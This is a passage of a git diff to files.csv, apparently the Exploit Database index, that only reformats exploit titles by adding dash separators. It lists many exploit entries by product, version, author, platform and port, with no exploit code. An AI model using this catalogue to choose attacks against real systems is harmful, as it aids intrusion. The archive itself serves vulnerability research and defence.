diff --git a/files.csv b/files.csv index ddd160e15..521d33a5a 100755 --- a/files.csv +++ b/files.csv @@ -398,7 +398,7 @@ id,file,description,date,author,platform,type,port 429,platforms/windows/dos/429.c,"Ground Control <= 1.0.0.7 (Server/Client) Denial of Service Exploit",2004-08-31,"Luigi Auriemma",windows,dos,0 430,platforms/php/webapps/430.txt,"TorrentTrader 1.0 RC2 SQL Injection Exploit",2004-09-01,aCiDBiTS,php,webapps,0 431,platforms/windows/remote/431.c,"AOL Instant Messenger AIM ""Away"" Message Remote Exploit",2004-09-02,"John Bissell",windows,remote,0 -432,platforms/bsd/remote/432.c,"Courier-IMAP <= 3.0.2-r1 auth_debug() Remote Format String Exploit",2004-09-02,ktha,bsd,remote,143 +432,platforms/bsd/remote/432.c,"Courier-IMAP <= 3.0.2-r1 - auth_debug() Remote Format String Exploit",2004-09-02,ktha,bsd,remote,143 433,platforms/multiple/dos/433.c,"Call of Duty <= 1.4 - Denial of Service Exploit",2004-09-05,"Luigi Auriemma",multiple,dos,0 434,platforms/linux/local/434.sh,"CDRDAO Local Root Exploit",2004-09-07,"Karol Wiêsek",linux,local,0 435,platforms/windows/remote/435.c,"Trillian 0.74i Remote Buffer Overflow Exploit (MSN Module Bug)",2004-09-08,Komrade,windows,remote,0 @@ -445,7 +445,7 @@ id,file,description,date,author,platform,type,port 580,platforms/linux/remote/580.c,"Monit <= 4.2 Basic Authentication Remote Root Exploit",2004-10-17,rtk,linux,remote,2812 581,platforms/linux/remote/581.c,"ProFTPD <= 1.2.10 - Remote Users Enumeration Exploit",2004-10-17,"Leon Juranic",linux,remote,0 582,platforms/windows/remote/582.c,"YahooPOPs <= 1.6 SMTP Remote Buffer Overflow Exploit",2004-10-18,"Diabolic Crab",windows,remote,25 -583,platforms/windows/remote/583.pl,"SLX Server 6.1 Arbitrary File Creation Exploit (PoC)",2004-10-18,"Carl Livitt",windows,remote,0 +583,platforms/windows/remote/583.pl,"SLX Server 6.1 - Arbitrary File Creation Exploit (PoC)",2004-10-18,"Carl Livitt",windows,remote,0 584,platforms/windows/remote/584.c,"Microsoft Windows Metafile (.emf) Heap Overflow Exploit (MS04-032)",2004-10-20,houseofdabus,windows,remote,0 585,platforms/windows/dos/585.pl,"Microsoft Windows IIS - WebDAV XML Denial of Service Exploit (MS04-030)",2004-10-20,"Amit Klein",windows,dos,0 586,platforms/linux/local/586.c,"BitchX 1.0c19 - Local Root Exploit (suid?)",2004-10-20,Sha0,linux,local,0 @@ -635,7 +635,7 @@ id,file,description,date,author,platform,type,port 809,platforms/php/webapps/809.txt,"Chipmunk Forums SQL Injection Exploit",2005-02-10,GHC,php,webapps,0 810,platforms/windows/dos/810.c,"Armagetron Advanced <= 0.2.7.0 Server Crash Exploit",2005-02-10,"Luigi Auriemma",windows,dos,0 811,platforms/windows/local/811.c,"DelphiTurk e-Posta 1.0 - Local Exploit",2005-02-10,Kozan,windows,local,0 -812,platforms/linux/remote/812.c,"Exim <= 4.43 auth_spa_server() Remote PoC Exploit",2005-02-12,"Yuri Gushin",linux,remote,25 +812,platforms/linux/remote/812.c,"Exim <= 4.43 - auth_spa_server() Remote PoC Exploit",2005-02-12,"Yuri Gushin",linux,remote,25 813,platforms/windows/dos/813.c,"Quake 3 Engine Infostring Crash and Shutdown Exploit",2005-02-12,"Luigi Auriemma",windows,dos,0 814,platforms/php/webapps/814.txt,"MercuryBoard <= 1.1.1 Working SQL Injection",2005-02-12,Zeelock,php,webapps,0 815,platforms/linux/dos/815.c,"CA BrightStor ARCserve Backup Remote Buffer Overlow PoC",2005-02-12,cybertronic,linux,dos,0 @@ -677,14 +677,14 @@ id,file,description,date,author,platform,type,port 854,platforms/windows/remote/854.cpp,"Foxmail 1.1.0.1 POP3 Temp Dir Stack Overflow Exploit",2005-03-02,Swan,windows,remote,110 855,platforms/multiple/dos/855.pl,"Apache <= 2.0.52 HTTP GET request Denial of Service Exploit",2005-03-04,GreenwooD,multiple,dos,0 856,platforms/hardware/dos/856.c,"Nokia Symbian 60 (Bluetooth Nickname) Remote Restart (update)",2005-09-23,Qnix,hardware,dos,0 -857,platforms/php/webapps/857.txt,"PHP Form Mail 2.3 Arbitrary File Inclusion",2005-03-05,"Filip Groszynski",php,webapps,0 +857,platforms/php/webapps/857.txt,"PHP Form Mail 2.3 - Arbitrary File Inclusion",2005-03-05,"Filip Groszynski",php,webapps,0 858,platforms/php/webapps/858.txt,"phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial)",2005-03-05,PPC,php,webapps,0 859,platforms/windows/remote/859.c,"CA License Server (GETCONFIG) Remote Buffer Overflow Exploit (c)",2005-03-06,class101,windows,remote,10203 860,platforms/php/webapps/860.c,"Aztek Forum <= 4.0 [myadmin.php] Database Dumper Exploit",2005-03-07,sirius_black,php,webapps,0 861,platforms/windows/dos/861.c,"Microsoft Windows 2003/XP - Remote Denial of Service Exploit",2005-03-07,RusH,windows,dos,0 862,platforms/cgi/webapps/862.txt,"The Includer CGI <= 1.0 - Remote Command Execution",2005-03-07,"Francisco Alisson",cgi,webapps,0 863,platforms/windows/local/863.cpp,"RealPlayer 10 - (.smil) File Local Buffer Overflow Exploit",2005-03-07,nolimit,windows,local,0 -864,platforms/php/webapps/864.txt,"phpWebLog <= 0.5.3 Arbitrary File Inclusion",2005-03-07,"Filip Groszynski",php,webapps,0 +864,platforms/php/webapps/864.txt,"phpWebLog <= 0.5.3 - Arbitrary File Inclusion",2005-03-07,"Filip Groszynski",php,webapps,0 865,platforms/php/webapps/865.txt,"PHP mcNews <= 1.3 (skinfile) Remote File Include Vulnerability",2005-03-07,"Filip Groszynski",php,webapps,0 866,platforms/php/webapps/866.c,"paNews 2.0b4 - Remote Admin Creation SQL Injection Exploit",2005-03-08,Silentium,php,webapps,0 867,platforms/multiple/dos/867.c,"Ethereal <= 0.10.9 - Denial of Service",2005-03-08,"Leon Juranic",multiple,dos,0 @@ -863,7 +863,7 @@ id,file,description,date,author,platform,type,port 1052,platforms/php/webapps/1052.php,"Claroline e-Learning <= 1.6 - Remote Hash SQL Injection Exploit",2005-06-17,mh_p0rtal,php,webapps,0 1053,platforms/php/webapps/1053.pl,"Claroline e-Learning <= 1.6 - Remote Hash SQL Injection Exploit (2)",2005-06-19,K-C0d3r,php,webapps,0 1055,platforms/linux/remote/1055.c,"PeerCast <= 0.1211 - Remote Format String Exploit",2005-06-20,darkeagle,linux,remote,7144 -1056,platforms/multiple/dos/1056.pl,"Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service",2005-06-20,Qnix,multiple,dos,0 +1056,platforms/multiple/dos/1056.pl,"Apache <= 2.0.49 - Arbitrary Long HTTP Headers Denial of Service",2005-06-20,Qnix,multiple,dos,0 1057,platforms/php/webapps/1057.pl,"Simple Machines Forum <= 1.0.4 (modify) SQL Injection Exploit",2005-06-21,"James Bercegay",php,webapps,0 1058,platforms/php/webapps/1058.pl,"MercuryBoard <= 1.1.4 - SQL Injection Exploit",2005-06-21,RusH,php,webapps,0 1059,platforms/php/webapps/1059.pl,"WordPress <= 1.5.1.1 - ""add new admin"" SQL Injection Exploit",2005-06-21,RusH,php,webapps,0 @@ -914,7 +914,7 @@ id,file,description,date,author,platform,type,port 1105,platforms/windows/dos/1105.c,"NetPanzer <= 0.8 - Remote Denial of Service Exploit",2005-07-14,"Luigi Auriemma",windows,dos,0 1106,platforms/php/webapps/1106.txt,"e107 <= 0.617 - XSS Remote Cookie Disclosure Exploit",2005-07-14,warlord,php,webapps,0 1107,platforms/windows/dos/1107.pl,"Remote Control Server 1.6.2 - Denial of Service Exploit",2005-07-15,basher13,windows,dos,0 -1108,platforms/windows/remote/1108.pl,"Small HTTP Server <= 3.05.28 Arbitrary Data Execution Exploit",2005-07-15,basher13,windows,remote,0 +1108,platforms/windows/remote/1108.pl,"Small HTTP Server <= 3.05.28 - Arbitrary Data Execution Exploit",2005-07-15,basher13,windows,remote,0 1109,platforms/windows/dos/1109.pl,"DzSoft PHP Editor <= 3.1.2.8 - Denial of Service Exploit",2005-07-15,basher13,windows,dos,0 1110,platforms/windows/dos/1110.txt,"Microsoft Internet Explorer / MSN ICC Profiles Crash PoC Exploit",2005-07-15,"Edward Gagnon",windows,dos,0 1111,platforms/php/webapps/1111.pl,"Open Bulletin Board <= 1.0.5 - SQL Injection Exploit",2005-07-18,RusH,php,webapps,0 @@ -1148,7 +1148,7 @@ id,file,description,date,author,platform,type,port 1376,platforms/windows/dos/1376.c,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (c)",2005-12-19,Kozan,windows,dos,0 1377,platforms/windows/dos/1377.pl,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (pl)",2005-12-19,kokanin,windows,dos,0 1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 (EXAMINE) Buffer Overflow Exploit",2005-12-19,muts,windows,remote,0 -1379,platforms/php/webapps/1379.php,"PHPGedView <= 3.3.7 Arbitrary Remote Code Execution Exploit",2005-12-20,rgod,php,webapps,0 +1379,platforms/php/webapps/1379.php,"PHPGedView <= 3.3.7 - Arbitrary Remote Code Execution Exploit",2005-12-20,rgod,php,webapps,0 1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit",2005-12-20,muts,windows,remote,143 1381,platforms/windows/remote/1381.pm,"Golden FTP Server <= 1.92 (APPE) Remote Overflow Exploit (meta)",2005-12-20,redsand,windows,remote,21 1382,platforms/php/webapps/1382.pl,"phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (updated)",2006-02-20,DarkFig,php,webapps,0 @@ -1410,7 +1410,7 @@ id,file,description,date,author,platform,type,port 1679,platforms/novell/remote/1679.pm,"Novell Messenger Server 2.0 (Accept-Language) Remote Overflow Exploit",2006-04-15,"H D Moore",novell,remote,8300 1680,platforms/cgi/webapps/1680.pm,"Symantec Sygate Management Server - (login) SQL Injection Exploit",2006-04-15,Nicob,cgi,webapps,0 1681,platforms/windows/remote/1681.pm,"Sybase EAServer 5.2 (WebConsole) Remote Stack Overflow Exploit",2006-04-15,N/A,windows,remote,8080 -1682,platforms/php/webapps/1682.php,"Fuju News 1.0 Authentication Bypass / Remote SQL Injection Exploit",2006-04-16,snatcher,php,webapps,0 +1682,platforms/php/webapps/1682.php,"Fuju News 1.0 - Authentication Bypass / Remote SQL Injection Exploit",2006-04-16,snatcher,php,webapps,0 1683,platforms/php/webapps/1683.php,"Blackorpheus ClanMemberSkript 1.0 - Remote SQL Injection Exploit",2006-04-16,snatcher,php,webapps,0 1686,platforms/php/webapps/1686.pl,"FlexBB <= 0.5.5 (/inc/start.php _COOKIE) Remote SQL ByPass Exploit",2006-04-17,Devil-00,php,webapps,0 1687,platforms/php/webapps/1687.txt,"MyEvent <= 1.3 (myevent_path) Remote File Inclusion Vulnerability",2006-04-17,botan,php,webapps,0 @@ -1488,7 +1488,7 @@ id,file,description,date,author,platform,type,port 1774,platforms/php/webapps/1774.txt,"pafileDB <= 2.0.1 (mxBB/phpBB) Remote File Inclusion Vulnerability",2006-05-09,Darkfire,php,webapps,0 1775,platforms/windows/dos/1775.html,"Microsoft Internet Explorer <= 6.0.2900 SP2 (CSS Attribute) Denial of Service",2006-05-10,seven,windows,dos,0 1776,platforms/windows/remote/1776.c,"Medal of Honor (getinfo) Remote Buffer Overflow Exploit",2006-05-10,RunningBon,windows,remote,12203 -1777,platforms/php/webapps/1777.php,"Unclassified NewsBoard <= 1.6.1 patch 1 Arbitrary Local Inclusion Exploit",2006-05-11,rgod,php,webapps,0 +1777,platforms/php/webapps/1777.php,"Unclassified NewsBoard <= 1.6.1 patch 1 - Arbitrary Local Inclusion Exploit",2006-05-11,rgod,php,webapps,0 1778,platforms/php/webapps/1778.txt,"Foing <= 0.7.0 (phpBB) Remote File Inclusion Vulnerability",2006-05-12,"Kurdish Security",php,webapps,0 1779,platforms/php/webapps/1779.txt,"Php Blue Dragon CMS <= 2.9 - Remote File Include Vulnerability",2006-05-12,Kacper,php,webapps,0 1780,platforms/php/webapps/1780.php,"phpBB <= 2.0.20 (Admin/Restore DB/default_lang) Remote Exploit",2006-05-13,rgod,php,webapps,0 @@ -1702,7 +1702,7 @@ id,file,description,date,author,platform,type,port 1994,platforms/php/webapps/1994.txt,"SimpleBoard Mambo Component <= 1.1.0 - Remote Include Vulnerability",2006-07-08,h4ntu,php,webapps,0 1995,platforms/php/webapps/1995.txt,"com_forum Mambo Component <= 1.2.4RC3 - Remote Include Vulnerability",2006-07-08,h4ntu,php,webapps,0 1996,platforms/php/webapps/1996.txt,"Sabdrimer PRO <= 2.2.4 (pluginpath) Remote File Include Vulnerability",2006-07-09,A.nosrati,php,webapps,0 -1997,platforms/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit",2006-07-09,joffer,multiple,remote,10000 +1997,platforms/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Exploit",2006-07-09,joffer,multiple,remote,10000 1998,platforms/php/webapps/1998.pl,"Ottoman CMS <= 1.1.3 (default_path) Remote File Inclusion Exploit",2006-07-09,"Jacek Wlodarczyk",php,webapps,0 1999,platforms/windows/local/1999.pl,"Microsoft Word 2000/2003 Hlink Local Buffer Overflow Exploit PoC",2006-07-09,"SYS 49152",windows,local,0 2000,platforms/hardware/dos/2000.pl,"SIPfoundry sipXtapi (CSeq) Remote Buffer Overflow Exploit PoC",2006-07-10,"Michael Thumann",hardware,dos,0 @@ -2958,7 +2958,7 @@ id,file,description,date,author,platform,type,port 3288,platforms/php/webapps/3288.asp,"LushiWarPlaner 1.0 (register.php) Remote SQL Injection Exploit",2007-02-08,ajann,php,webapps,0 3289,platforms/linux/dos/3289.c,"Axigen <= 2.0.0b1 - Remote Denial of Service Exploit",2007-02-08,mu-b,linux,dos,0 3290,platforms/linux/dos/3290.c,"Axigen <= 2.0.0b1 - Remote Denial of Service Exploit (2)",2007-02-08,mu-b,linux,dos,0 -3291,platforms/windows/remote/3291.pl,"SAP Web Application Server 6.40 Arbitrary File Disclosure Exploit",2007-02-08,Nicob,windows,remote,0 +3291,platforms/windows/remote/3291.pl,"SAP Web Application Server 6.40 - Arbitrary File Disclosure Exploit",2007-02-08,Nicob,windows,remote,0 3292,platforms/php/webapps/3292.txt,"OPENi-CMS Site Protection Plugin Remote File Inclusion Vulnerability",2007-02-11,y3dips,php,webapps,0 3293,platforms/solaris/remote/3293.sh,"SunOS 5.10/5.11 in.telnetd Remote Authentication Bypass Exploit",2007-02-11,kingcope,solaris,remote,23 3294,platforms/hardware/remote/3294.txt,"IP3 NetAccess < 4.1.9.6 - Remote Arbitrary File Disclosure Vulnerability",2007-02-11,"Sebastian Wolfgarten",hardware,remote,80 @@ -3441,8 +3441,8 @@ id,file,description,date,author,platform,type,port 3785,platforms/php/webapps/3785.txt,"Post Revolution <= 0.7.0 RC 2 (dir) Remote File Inclusion Vulnerability",2007-04-23,InyeXion,php,webapps,0 3786,platforms/php/webapps/3786.txt,"GPB Bulletin Board Multiple Remote File Inclusion Vulnerabilities",2007-04-24,"ThE TiGeR",php,webapps,0 3787,platforms/linux/remote/3787.c,"GNU Mailutils imap4d 0.6 - Remote Format String Exploit (exec-shield)",2007-04-24,Xpl017Elz,linux,remote,143 -3788,platforms/windows/dos/3788.html,"Second Sight Software ActiveGS.ocx ActiveX Buffer Overflow PoC",2007-04-24,"Umesh Wanve",windows,dos,0 -3789,platforms/windows/dos/3789.html,"Second Sight Software ActiveMod.ocx ActiveX Buffer Overflow PoC",2007-04-24,"Umesh Wanve",windows,dos,0 +3788,platforms/windows/dos/3788.html,"Second Sight Software - ActiveGS.ocx ActiveX Buffer Overflow PoC",2007-04-24,"Umesh Wanve",windows,dos,0 +3789,platforms/windows/dos/3789.html,"Second Sight Software - ActiveMod.ocx ActiveX Buffer Overflow PoC",2007-04-24,"Umesh Wanve",windows,dos,0 3790,platforms/windows/dos/3790.html,"NetSprint Toolbar ActiveX toolbar.dll Denial of Service PoC",2007-04-24,"Umesh Wanve",windows,dos,0 3791,platforms/hardware/dos/3791.pl,"Linksys SPA941 \377 character Remote Denial of Service Exploit",2007-04-24,MADYNES,hardware,dos,0 3792,platforms/hardware/dos/3792.pl,"Linksys SPA941 (remote reboot) Remote Denial of Service Exploit",2007-04-24,MADYNES,hardware,dos,0 @@ -3542,7 +3542,7 @@ id,file,description,date,author,platform,type,port 3886,platforms/php/webapps/3886.pl,"SimpleNews <= 1.0.0 FINAL (print.php news_id) SQL Injection Exploit",2007-05-09,Silentz,php,webapps,0 3887,platforms/php/webapps/3887.pl,"TutorialCMS <= 1.00 (search.php search) SQL Injection Exploit",2007-05-09,Silentz,php,webapps,0 3888,platforms/windows/local/3888.c,"Gimp 2.2.14 - (.ras) Download/Execute Buffer Overflow Exploit (Win32)",2007-05-09,"Kristian Hermansen",windows,local,0 -3890,platforms/windows/dos/3890.html,"McAfee VirusScan 10.0.21 ActiveX control Stack Overflow PoC",2007-05-09,callAX,windows,dos,0 +3890,platforms/windows/dos/3890.html,"McAfee VirusScan 10.0.21 - ActiveX control Stack Overflow PoC",2007-05-09,callAX,windows,dos,0 3891,platforms/windows/dos/3891.html,"Remote Display Dev kit 1.2.1.0 RControl.dll Denial of Service Exploit",2007-05-10,shinnai,windows,dos,0 3892,platforms/windows/remote/3892.html,"Microsoft Internet Explorer <= 7 - Remote Arbitrary File Rewrite PoC (MS07-027)",2007-05-10,"Andres Tarasco",windows,remote,0 3893,platforms/windows/remote/3893.c,"McAfee Security Center IsOldAppInstalled ActiveX BoF Exploit",2007-05-10,Jambalaya,windows,remote,0 @@ -3551,7 +3551,7 @@ id,file,description,date,author,platform,type,port 3896,platforms/php/webapps/3896.pl,"TaskDriver <= 1.2 Login Bypass/SQL Injection Exploit",2007-05-10,Silentz,php,webapps,0 3897,platforms/windows/local/3897.c,"eTrust Antivirus Agent r8 - Local Privilege Elevation Exploit",2007-05-11,binagres,windows,local,0 3898,platforms/windows/dos/3898.html,"Hewlett Packard 1.0.0.309 hpqvwocx.dll ActiveX Magview Overflow PoC",2007-05-11,callAX,windows,dos,0 -3899,platforms/windows/remote/3899.html,"Morovia Barcode ActiveX Professional 3.3.1304 Arbitrary File Overwrite",2007-05-11,shinnai,windows,remote,0 +3899,platforms/windows/remote/3899.html,"Morovia Barcode ActiveX Professional 3.3.1304 - Arbitrary File Overwrite",2007-05-11,shinnai,windows,remote,0 3900,platforms/php/webapps/3900.php,"Snaps! Gallery 1.4.4 - Remote User Pass Change Exploit",2007-05-11,Dj7xpl,php,webapps,0 3901,platforms/php/webapps/3901.txt,"maGAZIn 2.0 (phpThumb.php src) Remote File Disclosure Vulnerability",2007-05-11,Dj7xpl,php,webapps,0 3902,platforms/php/webapps/3902.txt,"R2K Gallery 1.7 (galeria.php lang2) Local File Inclusion Vulnerability",2007-05-11,Dj7xpl,php,webapps,0 @@ -3567,7 +3567,7 @@ id,file,description,date,author,platform,type,port 3913,platforms/windows/remote/3913.c,"webdesproxy 0.0.1 (GET Request) Remote Buffer Overflow Exploit",2007-05-12,vade79,windows,remote,8080 3914,platforms/asp/webapps/3914.txt,"BlogMe 3.0 (archshow.asp var) Remote SQL Injection Vulnerability",2007-05-13,gsy,asp,webapps,0 3915,platforms/php/webapps/3915.txt,"CJG EXPLORER PRO 3.2 (g_pcltar_lib_dir) RFI Vulnerabilities",2007-05-13,Mogatil,php,webapps,0 -3916,platforms/windows/remote/3916.php,"VImpX ActiveX (VImpX.ocx 4.7.3.0) - Remote Buffer Overflow Exploit",2007-05-13,rgod,windows,remote,0 +3916,platforms/windows/remote/3916.php,"VImpX - ActiveX (VImpX.ocx 4.7.3.0) - Remote Buffer Overflow Exploit",2007-05-13,rgod,windows,remote,0 3917,platforms/windows/dos/3917.html,"ID Automation Linear Barcode ActiveX Denial of Service Exploit",2007-05-13,shinnai,windows,dos,0 3918,platforms/php/webapps/3918.txt,"phpAtm 1.30 (downloadfile) Remote File Disclosure Vulnerability",2007-05-13,Ali.Mohajem,php,webapps,0 3919,platforms/php/webapps/3919.txt,"NagiosQL 2005 2.00 (prepend_adm.php) Remote File Inclusion Vuln",2007-05-14,"ThE TiGeR",php,webapps,0 @@ -3614,12 +3614,12 @@ id,file,description,date,author,platform,type,port 3960,platforms/php/webapps/3960.php,"Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit",2007-05-21,waraxe,php,webapps,0 3961,platforms/windows/remote/3961.html,"LeadTools Raster Variant (LTRVR14e.dll) Remote File Overwrite Exploit",2007-05-21,shinnai,windows,remote,0 3962,platforms/php/webapps/3962.txt,"Ol Bookmarks Manager 0.7.4 (root) Remote File Inclusion Vulnerabilities",2007-05-21,"ThE TiGeR",php,webapps,0 -3963,platforms/php/webapps/3963.txt,"TutorialCMS <= 1.01 Authentication Bypass Vulnerability",2007-05-21,Silentz,php,webapps,0 +3963,platforms/php/webapps/3963.txt,"TutorialCMS <= 1.01 - Authentication Bypass Vulnerability",2007-05-21,Silentz,php,webapps,0 3964,platforms/php/webapps/3964.txt,"Ol Bookmarks Manager 0.7.4 - Remote SQL Injection Vulnerability",2007-05-21,"Mehmet Ince",php,webapps,0 3965,platforms/windows/dos/3965.pl,"Microsoft IIS 6.0 (/AUX/.aspx) Remote Denial of Service Exploit",2007-05-21,kingcope,windows,dos,0 3966,platforms/windows/remote/3966.php,"Pegasus ImagN ActiveX Control Remote Buffer Overflow Exploit",2007-05-21,rgod,windows,remote,0 3967,platforms/windows/remote/3967.html,"Virtual CD 9.0.0.2 (vc9api.DLL) Remote Shell Commands Execution Exploit",2007-05-21,rgod,windows,remote,0 -3968,platforms/windows/remote/3968.html,"KSign KSignSWAT <= 2.0.3.3 ActiveX Control Remote BoF Exploit",2007-05-22,"KIM Kee-hong",windows,remote,0 +3968,platforms/windows/remote/3968.html,"KSign KSignSWAT <= 2.0.3.3 - ActiveX Control Remote BoF Exploit",2007-05-22,"KIM Kee-hong",windows,remote,0 3969,platforms/windows/dos/3969.html,"LeadTools ISIS Control - (ltisi14E.ocx v.14.5.0.44) Remote DoS Exploit",2007-05-22,shinnai,windows,dos,0 3970,platforms/php/webapps/3970.txt,"BtiTracker <= 1.4.1 (become admin) Remote SQL Injection Vulnerability",2007-05-22,m@ge|ozz,php,webapps,0 3971,platforms/php/webapps/3971.php,"NavBoard 2.6.0 - Remote Code Execution Exploit",2007-05-23,Dj7xpl,php,webapps,0 @@ -3630,7 +3630,7 @@ id,file,description,date,author,platform,type,port 3976,platforms/windows/dos/3976.pl,"Microsoft Visual Basic 6.0 Project (Company Name) Stack Overflow PoC",2007-05-23,UmZ,windows,dos,0 3977,platforms/windows/dos/3977.pl,"Microsoft Visual Basic 6.0 Project (Description) Stack Overflow PoC",2007-05-23,UmZ,windows,dos,0 3978,platforms/windows/dos/3978.pl,"UltraISO <= 8.6.2.2011 (Cue/Bin Files) Local Buffer Overflow PoC",2007-05-24,n00b,windows,dos,0 -3979,platforms/windows/dos/3979.html,"LeadTools Raster Dialog File Object Activex Remote Buffer Overflow PoC",2007-05-24,shinnai,windows,dos,0 +3979,platforms/windows/dos/3979.html,"LeadTools Raster Dialog File Object ActiveX Remote Buffer Overflow PoC",2007-05-24,shinnai,windows,dos,0 3980,platforms/php/webapps/3980.pl,"Dokeos <= 1.6.5 (courseLog.php scormcontopen) SQL Injection Exploit",2007-05-24,Silentz,php,webapps,0 3981,platforms/php/webapps/3981.php,"cpCommerce <= 1.1.0 (category.php id_category) SQL Injection Exploit",2007-05-24,Kacper,php,webapps,0 3982,platforms/windows/remote/3982.html,"Dart Communications PowerTCP Service Control Remote BoF Exploit",2007-05-24,rgod,windows,remote,0 @@ -3692,8 +3692,8 @@ id,file,description,date,author,platform,type,port 4039,platforms/php/webapps/4039.txt,"Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit",2007-06-06,Slappter,php,webapps,0 4040,platforms/asp/webapps/4040.txt,"Kartli Alisveris Sistemi 1.0 - Remote SQL Injection Vulnerability",2007-06-06,kerem125,asp,webapps,0 4041,platforms/php/webapps/4041.htm,"NewsSync for phpBB 1.5.0rc6 - Remote File Inclusion Exploit",2007-06-07,GoLd_M,php,webapps,0 -4042,platforms/windows/remote/4042.html,"Yahoo! Messenger Webcam 8.1 ActiveX Remote Buffer Overflow Exploit",2007-06-07,Excepti0n,windows,remote,0 -4043,platforms/windows/remote/4043.html,"Yahoo! Messenger Webcam 8.1 ActiveX Remote Buffer Overflow Exploit 2",2007-06-07,Excepti0n,windows,remote,0 +4042,platforms/windows/remote/4042.html,"Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow Exploit",2007-06-07,Excepti0n,windows,remote,0 +4043,platforms/windows/remote/4043.html,"Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow Exploit 2",2007-06-07,Excepti0n,windows,remote,0 4044,platforms/windows/dos/4044.txt,"Microsoft Windows GDI+ - ICO File Remote Denial of Service Exploit",2007-06-07,Kad,windows,dos,0 4045,platforms/windows/remote/4045.py,"Microsoft Windows Animated Cursor Stack Overflow Exploit",2007-06-07,"RISE Security",windows,remote,0 4046,platforms/windows/dos/4046.pl,"MiniWeb Http Server 0.8.x - Remote Denial of Service Exploit",2007-06-07,gbr,windows,dos,0 @@ -3709,7 +3709,7 @@ id,file,description,date,author,platform,type,port 4057,platforms/asp/webapps/4057.txt,"GeometriX Download Portal (down_indir.asp id) SQL Injection Vuln",2007-06-09,CyberGhost,asp,webapps,0 4058,platforms/windows/dos/4058.py,"Ace-FTP Client 1.24a Remote Buffer Overflow PoC",2007-06-10,n00b,windows,dos,0 4059,platforms/php/webapps/4059.txt,"Link Request Contact Form 3.4 - Remote Code Execution Vulnerability",2007-06-11,CorryL,php,webapps,0 -4060,platforms/windows/remote/4060.html,"TEC-IT TBarCode OCX ActiveX Remote Arbitrary File Overwrite Exploit",2007-06-12,shinnai,windows,remote,0 +4060,platforms/windows/remote/4060.html,"TEC-IT TBarCode - OCX ActiveX Remote Arbitrary File Overwrite Exploit",2007-06-12,shinnai,windows,remote,0 4061,platforms/windows/remote/4061.html,"Safari 3 for Windows Beta Remote Command Execution PoC",2007-06-12,"Thor Larholm",windows,remote,0 4062,platforms/php/webapps/4062.pl,"Fuzzylime Forum 1.0 (low.php topic) Remote SQL Injection Exploit",2007-06-12,Silentz,php,webapps,0 4063,platforms/php/webapps/4063.txt,"xoops module tinycontent 1.5 - Remote File Inclusion Vulnerability",2007-06-12,Sp[L]o1T,php,webapps,0 @@ -3747,7 +3747,7 @@ id,file,description,date,author,platform,type,port 4098,platforms/php/webapps/4098.php,"Simple Invoices 2007 05 25 (index.php submit) SQL Injection Exploit",2007-06-24,Kacper,php,webapps,0 4099,platforms/php/webapps/4099.txt,"e107 <= 0.7.8 - (photograph) Arbitrary File Upload Vulnerability",2007-06-24,g00ns,php,webapps,0 4100,platforms/php/webapps/4100.txt,"phpTrafficA <= 1.4.2 (pageid) Remote SQL Injection Vulnerability",2007-06-24,"laurent gaffié ",php,webapps,0 -4101,platforms/windows/remote/4101.html,"NCTAudioEditor2 ActiveX DLL (NCTWMAFile2.dll 2.6.2.157) - Exploit",2007-06-25,shinnai,windows,remote,0 +4101,platforms/windows/remote/4101.html,"NCTAudioEditor2 - ActiveX DLL (NCTWMAFile2.dll 2.6.2.157) - Exploit",2007-06-25,shinnai,windows,remote,0 4102,platforms/php/webapps/4102.txt,"b1gbb 2.24.0 (footer.inc.php tfooter) Remote File Inclusion Vulnerability",2007-06-25,Rf7awy,php,webapps,0 4103,platforms/php/webapps/4103.txt,"bugmall shopping cart 2.5 (sql/XSS) Multiple Vulnerabilities",2007-06-25,t0pP8uZz,php,webapps,0 4104,platforms/php/webapps/4104.txt,"6ALBlog (newsid) Remote SQL Injection Vulnerability",2007-06-25,Crackers_Child,php,webapps,0 @@ -3755,8 +3755,8 @@ id,file,description,date,author,platform,type,port 4106,platforms/php/webapps/4106.php,"DreamLog 0.5 (upload.php) Arbitrary File Upload Exploit",2007-06-25,Dj7xpl,php,webapps,0 4107,platforms/php/webapps/4107.txt,"Pagetool 1.07 (news_id) Remote SQL Injection Vulnerability",2007-06-25,Katatafish,php,webapps,0 4108,platforms/php/webapps/4108.txt,"eDocStore (doc.php doc_id) Remote SQL Injection Vulnerability",2007-06-25,t0pP8uZz,php,webapps,0 -4109,platforms/windows/remote/4109.html,"NCTAudioStudio2 ActiveX DLL 2.6.1.148 CreateFile() Insecure Method",2007-06-26,shinnai,windows,remote,0 -4110,platforms/windows/remote/4110.html,"Avaxswf.dll 1.0.0.1 from Avax Vector ActiveX Arbitrary Data Write",2007-06-26,callAX,windows,remote,0 +4109,platforms/windows/remote/4109.html,"NCTAudioStudio2 - ActiveX DLL 2.6.1.148 CreateFile() Insecure Method",2007-06-26,shinnai,windows,remote,0 +4110,platforms/windows/remote/4110.html,"Avaxswf.dll 1.0.0.1 from Avax Vector - ActiveX Arbitrary Data Write",2007-06-26,callAX,windows,remote,0 4111,platforms/php/webapps/4111.txt,"phpSiteBackup 0.1 (pcltar.lib.php) Remote File Inclusion Vulnerability",2007-06-26,GoLd_M,php,webapps,0 4112,platforms/php/webapps/4112.txt,"EVA-Web 1.1<= 2.2 (index.php3) Remote File Inclusion Vulnerabilities",2007-06-26,g00ns,php,webapps,0 4113,platforms/php/webapps/4113.pl,"WordPress 2.2 (wp-app.php) Arbitrary File Upload Exploit",2007-06-26,"Alexander Concha",php,webapps,0 @@ -3803,7 +3803,7 @@ id,file,description,date,author,platform,type,port 4155,platforms/windows/remote/4155.html,"HP Digital Imaging (hpqvwocx.dll 2.1.0.556) - 